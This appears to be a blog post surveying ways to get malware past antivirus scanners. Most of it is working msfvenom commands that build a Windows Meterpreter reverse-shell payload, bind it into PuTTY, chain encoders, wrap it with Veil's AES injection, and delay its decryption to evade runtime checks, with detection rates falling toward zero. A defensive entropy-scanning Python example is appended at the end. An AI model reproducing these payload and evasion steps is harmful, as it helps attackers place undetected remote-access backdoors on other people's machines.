A Quick Survey on Anti-Anti-Viruses

March 16, 2018
c++ malware

tl;dr

AVs can easily be bypassed with AES-based malware crypters like Crypt0r:

[Figure: AES Parameters]

Open Source Evasion Techniques

All of the following results are based on a Meterpreter executable which was generated like this:

msfvenom \
  -p windows/meterpreter/reverse_tcp \
  --platform windows \
  -f exe \
  LHOST=192.168.1.1 \
  LPORT=1337 \
  -o meter.exe

All scans are performed on VirusTotal. Please note that this covers static analysis only. However, it will become clear later on that dynamic analysis of the techniques used isn't required at all.

Packers

Packers compress malware and decompress it at runtime using an embedded decompression stub. Using the packer UPX actually looks suspicious to AVs: the detection rate increases once the packer is applied:

Without Packer  39/56
With Packer     41/56

Binder

This technique basically combines two executables, a malicious and an ordinary one, into one file. The malicious code is executed in a separate thread upon startup. This command was used to generate a Meterpreter shell in combination with the SSH client PuTTY (the duplicated -f exe of the original command is dropped):

msfvenom \
  -p windows/meterpreter/reverse_tcp \
  --platform windows \
  -x putty.exe \
  -k \
  -f exe \
  LHOST=192.168.1.1 \
  LPORT=1337 \
  -o meter.exe

A slight decrease in detections can be seen:

Without Binder  39/56
With Binder     33/56

Encoders

Using encoders, the malicious payload is obscured. There are many different approaches to this; however, the polymorphic encoder shikata_ga_nai is one of the most widely used ones. When an encoded malware file is executed, the entry point of the decoding routine is called first. The payload is then decoded and executed.

The results are the following:

No Encoder      39/56
XOR             33/56
powershell_x86  33/56
shikata_ga_nai  33/56

No change in detection rates between the encoders - let's chain multiple encoders and combine them with the binding technique (the typo LPORT 1337 of the original command is corrected to LPORT=1337; each stage reads the raw payload of the previous one from stdin):

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.1 \
  LPORT=1337 \
  -f raw \
  -e x86/context_time \
  -i 1 \
  --platform windows | \
msfvenom -a x86 \
  --platform windows \
  -e x86/countdown \
  -i 7 \
  -f raw | \
msfvenom -a x86 \
  --platform windows \
  -e x86/context_cpuid \
  -i 1 \
  -f raw | \
msfvenom -a x86 \
  --platform windows \
  -e x86/shikata_ga_nai \
  -i 2 \
  -x putty.exe \
  -k \
  -f exe \
  -o meter.exe

This yields 30/56 - better, but still not zero.

Using Veil

With Veil, hiding payloads becomes quite easy thanks to its built-in assistant. Using python/shellcode_inject/aes_encrypt in combination with Pyherion and a shellcode for windows/meterpreter/reverse_tcp decreases the detection rate down to 19/56.

Crypters

Crypters encrypt the malicious shellcode using a proper encryption algorithm. To execute the payload at runtime, the so-called stub brute-forces the embedded encrypted shellcode in order to invoke it. Using AES-128 and a delayed decryption, it was possible to decrease the detection down to zero for both scan-time and runtime checks. The runtime detection bypass basically delays the start of the decryption routine by performing unnecessary actions like:

In my tests, wasting about 30 seconds was enough to “shake off” the AV runtime check.

You can check out the source code here.
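From the defender's side, the packer results above and the encrypted crypter payload share one static tell: a compressed or encrypted blob has near-maximal byte entropy, which is one reason a UPX-packed file scores higher rather than lower. The following added Python example (not from this article, nor from Crypt0r or Veil) slides an entropy window over a constructed sample buffer, a text stub wrapped around a SHA-256 generated blob standing in for AES ciphertext, and reports the windows that look encrypted; the window size, threshold and sample bytes are assumptions chosen for the demonstration.

```python
"""Entropy-window scan: a static heuristic that flags the encrypted or
packed regions crypters and packers leave behind. Added example for this
article, not part of the original post. Sample buffers are constructed."""
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 512, step: int = 256,
                         threshold: float = 7.2) -> list:
    """Slide a window over the buffer and return (offset, length, entropy)
    for every window at or above the threshold. Plain x86 code and text
    usually sit around 4-6.5 bits/byte; AES ciphertext, compressed data
    and random keys approach 8 (about 7.6 for a 512-byte sample)."""
    hits = []
    for off in range(0, max(len(data) - window, 0) + 1, step):
        chunk = data[off:off + window]
        h = shannon_entropy(chunk)
        if h >= threshold:
            hits.append((off, len(chunk), round(h, 2)))
    return hits


def pseudo_random_bytes(seed: bytes, length: int) -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for an
    AES-encrypted shellcode blob; constructed, not real ciphertext."""
    out, block = bytearray(), seed
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:length])


# Constructed sample "binary": readable strings plus zero padding on both
# sides of an embedded encrypted blob, mimicking a crypter stub + payload.
SAMPLE_STUB = (b"This program cannot be run in DOS mode.\r\n" * 20).ljust(1024, b"\x00")
SAMPLE_BLOB = pseudo_random_bytes(b"constructed-seed", 2048)
SAMPLE_BINARY = SAMPLE_STUB + SAMPLE_BLOB + SAMPLE_STUB

if __name__ == "__main__":
    for off, ln, h in high_entropy_windows(SAMPLE_BINARY):
        print(f"offset 0x{off:05x} len {ln}: {h} bits/byte")
```

Windows that straddle the blob boundary stay below the threshold because half of them is low-entropy stub; only the seven windows lying fully inside the 2048-byte blob are reported, which is the shape of signal a packer/crypter heuristic keys on before any unpacking is attempted.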
